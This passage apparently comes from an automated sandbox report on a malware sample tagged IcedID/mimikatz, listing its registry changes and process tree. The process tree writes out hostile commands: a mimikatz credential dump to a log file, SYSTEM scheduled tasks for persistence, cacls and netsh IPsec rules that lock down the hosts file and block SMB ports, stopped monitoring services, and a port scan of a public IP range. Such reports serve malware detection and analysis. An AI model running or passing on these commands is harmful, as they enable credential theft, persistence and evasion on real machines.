\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ncgcflyve.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pnreyic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cuwoqc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pnreyic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1304 cmd.exe 2240 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023c9a-6.dat nsis_installer_2 behavioral2/files/0x0007000000023cab-15.dat nsis_installer_1 behavioral2/files/0x0007000000023cab-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" pnreyic.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" pnreyic.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" pnreyic.exe Key created \REGISTRY\USER\.DEFAULT\Software cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cntrtrctt.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" pnreyic.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2240 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1848 schtasks.exe 2172 schtasks.exe 4492 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1944 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1944 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3948 pnreyic.exe Token: SeDebugPrivilege 992 pnreyic.exe Token: SeDebugPrivilege 1764 vfshost.exe Token: SeDebugPrivilege 5100 cntrtrctt.exe Token: SeLockMemoryPrivilege 4376 zergmt.exe Token: SeLockMemoryPrivilege 4376 zergmt.exe Token: SeDebugPrivilege 3332 cntrtrctt.exe Token: SeDebugPrivilege 2968 cntrtrctt.exe Token: SeDebugPrivilege 4236 cntrtrctt.exe Token: SeDebugPrivilege 2252 cntrtrctt.exe Token: SeDebugPrivilege 1340 cntrtrctt.exe Token: SeDebugPrivilege 3748 cntrtrctt.exe Token: SeDebugPrivilege 1684 cntrtrctt.exe Token: SeDebugPrivilege 2780 cntrtrctt.exe Token: SeDebugPrivilege 4620 cntrtrctt.exe Token: SeDebugPrivilege 3776 cntrtrctt.exe Token: SeDebugPrivilege 2072 cntrtrctt.exe Token: SeDebugPrivilege 392 cntrtrctt.exe Token: SeDebugPrivilege 1092 cntrtrctt.exe Token: SeDebugPrivilege 3152 cntrtrctt.exe Token: SeDebugPrivilege 2296 cntrtrctt.exe Token: SeDebugPrivilege 116 cntrtrctt.exe Token: SeDebugPrivilege 2748 cntrtrctt.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1944 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe 1944 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe 3948 pnreyic.exe 3948 pnreyic.exe 992 pnreyic.exe 992 pnreyic.exe 4472 xohudmc.exe 1456 cuwoqc.exe 1704 pnreyic.exe 1704 pnreyic.exe 2640 pnreyic.exe 2640 pnreyic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1944 wrote to memory of 1304 1944 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe 83 PID 1944 wrote to memory of 1304 1944 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe 83 PID 1944 wrote to memory of 1304 1944 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe 83 PID 1304 wrote to memory of 2240 1304 cmd.exe 85 PID 1304 wrote to memory of 2240 1304 cmd.exe 85 PID 1304 wrote to memory of 2240 1304 cmd.exe 85 PID 1304 wrote to memory of 3948 1304 cmd.exe 87 PID 1304 wrote to memory of 3948 1304 cmd.exe 87 PID 1304 wrote to memory of 3948 1304 cmd.exe 87 PID 992 wrote to memory of 1060 992 pnreyic.exe 89 PID 992 wrote to memory of 1060 992 pnreyic.exe 89 PID 992 wrote to memory of 1060 992 pnreyic.exe 89 PID 1060 wrote to memory of 1488 1060 cmd.exe 91 PID 1060 wrote to memory of 1488 1060 cmd.exe 91 PID 1060 wrote to memory of 1488 1060 cmd.exe 91 PID 1060 wrote to memory of 1556 1060 cmd.exe 92 PID 1060 wrote to memory of 1556 1060 cmd.exe 92 PID 1060 wrote to memory of 1556 1060 cmd.exe 92 PID 1060 wrote to memory of 2672 1060 cmd.exe 93 PID 1060 wrote to memory of 2672 1060 cmd.exe 93 PID 1060 wrote to memory of 2672 1060 cmd.exe 93 PID 1060 wrote to memory of 2968 1060 cmd.exe 94 PID 1060 wrote to memory of 2968 1060 cmd.exe 94 PID 1060 wrote to memory of 2968 1060 cmd.exe 94 PID 1060 wrote to memory of 4596 1060 cmd.exe 95 PID 1060 wrote to memory of 4596 1060 cmd.exe 95 PID 1060 wrote to memory of 4596 1060 cmd.exe 95 PID 1060 wrote to memory of 4528 1060 cmd.exe 96 PID 1060 wrote to memory of 4528 1060 cmd.exe 96 PID 1060 wrote to memory of 4528 1060 cmd.exe 96 PID 992 wrote to memory of 1604 992 pnreyic.exe 98 PID 992 wrote to memory of 1604 992 pnreyic.exe 98 PID 992 wrote to memory of 1604 992 pnreyic.exe 98 PID 992 wrote to memory of 4948 992 pnreyic.exe 100 PID 992 wrote to memory of 4948 992 pnreyic.exe 100 PID 992 wrote to memory of 4948 992 pnreyic.exe 100 PID 992 wrote to memory of 2252 992 pnreyic.exe 102 PID 992 wrote to memory of 2252 992 pnreyic.exe 102 PID 992 wrote to memory of 2252 992 pnreyic.exe 102 PID 992 wrote to memory of 772 992 pnreyic.exe 116 PID 992 wrote to memory of 772 992 pnreyic.exe 116 PID 992 wrote to memory of 772 992 pnreyic.exe 116 PID 772 wrote to memory of 2160 772 cmd.exe 118 PID 772 wrote to memory of 2160 772 cmd.exe 118 PID 772 wrote to memory of 2160 772 cmd.exe 118 PID 2160 wrote to memory of 4092 2160 wpcap.exe 119 PID 2160 wrote to memory of 4092 2160 wpcap.exe 119 PID 2160 wrote to memory of 4092 2160 wpcap.exe 119 PID 4092 wrote to memory of 4404 4092 net.exe 121 PID 4092 wrote to memory of 4404 4092 net.exe 121 PID 4092 wrote to memory of 4404 4092 net.exe 121 PID 2160 wrote to memory of 3644 2160 wpcap.exe 122 PID 2160 wrote to memory of 3644 2160 wpcap.exe 122 PID 2160 wrote to memory of 3644 2160 wpcap.exe 122 PID 3644 wrote to memory of 2236 3644 net.exe 124 PID 3644 wrote to memory of 2236 3644 net.exe 124 PID 3644 wrote to memory of 2236 3644 net.exe 124 PID 2160 wrote to memory of 1916 2160 wpcap.exe 125 PID 2160 wrote to memory of 1916 2160 wpcap.exe 125 PID 2160 wrote to memory of 1916 2160 wpcap.exe 125 PID 1916 wrote to memory of 688 1916 net.exe 127 PID 1916 wrote to memory of 688 1916 net.exe 127 PID 1916 wrote to memory of 688 1916 net.exe 127 PID 2160 wrote to memory of 1512 2160 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2064
-
C:\Windows\TEMP\gcettrccj\zergmt.exe"C:\Windows\TEMP\gcettrccj\zergmt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\hrmeszcf\pnreyic.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2240
-
-
C:\Windows\hrmeszcf\pnreyic.exeC:\Windows\hrmeszcf\pnreyic.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3948
-
-
-
C:\Windows\hrmeszcf\pnreyic.exeC:\Windows\hrmeszcf\pnreyic.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1488
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2672
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4596
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4528
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1604
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4948
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2252
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\nblmptktz\etgfqftjv\wpcap.exeC:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4404
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2236
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:688
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1512 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4816
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1020 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2452 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2240
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3556
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2080
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:756 -
C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exeC:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nblmptktz\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4384 -
C:\Windows\nblmptktz\Corporate\vfshost.exeC:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3052 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2172
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4256
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:368
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3776
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1728
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1320
-
-
